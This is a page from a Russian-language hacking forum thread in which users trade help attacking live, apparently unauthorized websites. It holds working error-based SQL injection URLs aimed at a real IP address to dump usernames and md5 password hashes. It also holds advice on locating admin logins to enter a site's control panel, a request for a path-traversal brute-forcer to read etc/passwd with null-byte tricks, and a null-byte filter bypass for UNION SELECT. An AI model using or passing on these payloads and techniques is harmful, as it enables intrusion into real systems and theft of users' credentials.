FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1640 из 2422

1640

Опции темы

Поиск в этой теме

Опции просмотра

22.03.2011, 20:49

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от Konfuz™

Konfuz™ said:
Есть ли возможность заюзать SQL Inection в данном случае? На месте &dt должна быть дата например 2011-03-19

Есть. Без особых даже проблем. Кури маны.

Цитата:

Сообщение от Oro4imaru

Oro4imaru said:
в базе нашел пас ид №1 нашел админку а войти не могу так как логина нет. что делать подскажыте????

Искать логин в другой таблице как вариант. id же тебе известен.

__________________

22.03.2011, 22:09

eclipse

Guest

Сообщений: n/a

Провел на форуме:
30555

Репутация: 85

Цитата:

Сообщение от None

не могу заюзать SQL Inj

Помоему там ограничение на длину запроса. потому и не получается ничего)

23.03.2011, 01:33

Konfuz™

Новичок

Регистрация: 19.05.2010

Сообщений: 6

Провел на форуме:
31049

Репутация: 0

Отправить сообщение для Konfuz™ с помощью ICQ

Есть SQL Injection

http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `name` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--

Меняем LIMIT 0,1 - получаем 158 пользователей...

http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `pass` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--

Первые 3 пользователя выводит md5 пароль, остальные нет... В чем может быть беда?

23.03.2011, 01:43

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

Цитата:

Сообщение от Konfuz™

Konfuz™ said:
Есть SQL Injection
http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `name` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--
Меняем LIMIT 0,1 - получаем 158 пользователей...
http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `pass` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--
Первые 3 пользователя выводит md5 пароль, остальные нет... В чем может быть беда?

http://95.215.1.82/stat.php?id=' and '0' or 1 group by concat((select count(pass) from users),rand(0)|0) having sum(0)-- 1

23.03.2011, 01:45

Konfuz™

Новичок

Регистрация: 19.05.2010

Сообщений: 6

Провел на форуме:
31049

Репутация: 0

Цитата:

Сообщение от None

http://95.215.1.82/stat.php?id=' and '0' or 1 group by concat((select count(pass) from users),rand(0)|0) having sum(0)-- 1

я уже увидел что всего 3 пароля, как такое может быть?

Какие есть варианты? Пароли лежат где-то еще?

23.03.2011, 01:48

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

Цитата:

Сообщение от Konfuz™

Konfuz™ said:
я уже увидел что всего 3 пароля, как такое может быть?

Колонке не присвоено not null при создании. Следовательно, они могут быть пустыми.

23.03.2011, 02:38

DCrypt

Новичок

Регистрация: 21.01.2010

Сообщений: 0

Провел на форуме:
479

Репутация: 0

Есть вот такие штуки:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Warning[/COLOR][COLOR="#007700"]: include([/COLOR][COLOR="#0000BB"]service[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#DD0000"]') [function.include]: failed to open stream: No such file or directory in /home/corpxcoz/public_html/321.co.za/home.php on line 111

-------

Warning: include(templates/default/testimonials_browse.php\') [function.include]: failed to open stream: No such file or directory in /home/pmagic/public_html/helpdesk/index.php on line 82

----------------

Warning: include(/homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/templates/default/knowledgebase_browse.php\') [function.include]: failed to open stream: No such file or directory in /homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/index.php on line 85

[/COLOR][/COLOR]

И т.д.

Подкинье брутер etc/passwd, passwd%00, который перебирает пути ../, ../../, ../../../ и т.д на валид.

Желательно на перле или питоне. Спасибо.

23.03.2011, 03:00

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

Цитата:

Сообщение от DCrypt

DCrypt said:
Подкинье брутер etc/passwd, passwd%00

Посчитай кол-во каталогов от корня до исходного файла исходя из ошибки.

23.03.2011, 03:32

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Не пропускает запросы, где есть union select from. Просто union select - все норм, при добавление from - еррор. /*!union*/ /*!select*/ /*!from*/ не прокатило /*!union+select*/ fromтоже. Изменение регистров не вариант. Есть какие-нибудь предложения?

Проблема решена.

Обошел так:

uni%00on sele%00ct from

#10

23.03.2011, 10:41

Oro4imaru

Guest

Сообщений: n/a

Провел на форуме:
4616

Репутация: 0

не могу найти логин админа в панель в базах нет, автор новостей скрыт, на сайте не нашел ?????

Страница 1640 из 2422

1640

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ